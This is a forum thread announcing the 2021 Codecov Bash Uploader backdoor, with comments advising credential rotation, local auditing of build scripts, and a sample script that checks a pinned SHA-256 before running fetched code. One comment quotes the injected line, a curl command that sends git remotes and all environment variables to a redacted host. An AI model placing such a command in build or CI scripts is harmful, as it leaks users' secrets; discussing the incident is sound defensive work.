Important PSA - Codecov.IO Bash Uploader Security Update

There has been a fairly serious backdoor implanted resulting in credential leakage.

If you use/have used their tool, please be sure to revoke/rotate your credentials immediately.

More information:

https://about.codecov.io/security-update/

Ars Technica has coverage here: https://arstechnica.com/gadgets/2021/04/backdoored-developer-tool-that-stole-credentials-escaped-notice-for-3-months/

Comments

  • So somebody updates a core component, they do not notice for 3 months and then the line added is this? THIS?

    The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.
    
    curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<redacted>/upload/v2 || true
    

    Not some company or software I would ever use.

  • alexvolk Member
    edited April 2021

    I didn’t receive a communication from Codecov. Was I not affected?
    You may not have been affected. We have contacted users for whom we had email accounts and posted a notification in the app.

    Really? No email was received. Just logged in to my account and surprise:

    Action Required: You were Impacted by Codecov’s Bash Uploader Security Issue.
    Codecov recently disclosed a security issue. Based on our records, we believe you were impacted and should take immediate action.

  • Daniel15 Veteran
    edited April 2021

    In news that should surprise nobody, downloading and executing an arbitrary shell script from a third party server as part of your build process may not be the most secure thing to do. You should really save a local copy to your repo so that changes can be properly audited.
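    One way to act on the advice above, as an added example that is not code from this thread or from Codecov: keep the audited copy of the uploader in the repo, record its SHA-256, and have the build refuse to run any copy whose digest differs. It assumes a POSIX shell with sha256sum and mktemp; the script contents and the appended line are constructed for the demo.

    ```shell
    #!/bin/sh
    # Added example (not Codecov's or the thread's code): run a fetched build
    # script only if it matches the digest of the copy that was reviewed.
    set -eu

    # $1 = path to the script about to be executed
    # $2 = pinned SHA-256 hex digest of the reviewed copy (committed to the repo)
    # Returns 0 when the digests match, 1 (with a message on stderr) otherwise.
    verify_pinned_script() {
        vps_actual="$(sha256sum "$1" | awk '{print $1}')"
        if [ "$vps_actual" != "$2" ]; then
            echo "refusing to run $1: sha256 $vps_actual does not match pinned $2" >&2
            return 1
        fi
        return 0
    }

    # Demo on a constructed script; no network access is needed.
    demo_dir="$(mktemp -d)"
    printf '#!/bin/sh\necho "uploading coverage report"\n' > "$demo_dir/uploader.sh"
    # In practice this digest is computed once at review time and committed.
    pinned="$(sha256sum "$demo_dir/uploader.sh" | awk '{print $1}')"

    # Unmodified copy: digest matches, so it may be executed.
    if verify_pinned_script "$demo_dir/uploader.sh" "$pinned"; then
        sh "$demo_dir/uploader.sh"
    fi

    # A single appended line (as in the incident) changes the digest, so it is blocked.
    printf '# one extra line appended after review\n' >> "$demo_dir/uploader.sh"
    if ! verify_pinned_script "$demo_dir/uploader.sh" "$pinned"; then
        echo "blocked: uploader differs from the reviewed copy"
    fi
    ```
    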

  • @Daniel15 said: downloading and executing an arbitrary shell script from a third party server as part of your build process

    You'd be surprised at how many such issues go underreported and/or get masked under the veneer of automation.

    Sometime back, IIRC, there was a similar issue with some similar bad packages that were added into the Node package repository.

    This is definitely not going to be the end of such issues.

    An interesting read on a related issue is: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
